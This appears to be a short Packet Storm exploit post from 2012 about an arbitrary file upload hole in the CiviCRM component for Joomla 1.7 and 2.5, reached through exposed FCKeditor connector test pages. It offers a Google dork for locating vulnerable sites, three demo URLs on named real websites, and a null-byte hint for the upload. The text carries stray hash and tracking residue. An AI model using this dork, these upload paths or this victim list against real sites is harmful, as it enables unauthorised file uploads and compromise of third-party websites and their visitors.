Joomla versions 1.7 and 2.5 suffers from an arbitrary file upload vulnerability in the Civicrm component.
5409c8f69be1b43458970487fee32a18637708e439cd0869b6a54d62c9b6bb0e# Exploit Title: joomla 1.7 & 2.5 (com_civicrm) Arbitrary File Upload
Vulnerability
# Google Dork: inurl:/components/com_civicrm/
# Date: 08/22/2012
# Author: Crim3R
# download Link : http://sourceforge.net/projects/civicrm/files/civicrm-stable/
# Tested on: all
==================================
D3m0:
http://artistic-webdesign.com/lynda/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/uploadtest.html
http://pflagillinois.org/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html
http://madacenter.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html
===============Crim3R@Att.Net=========
$Home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed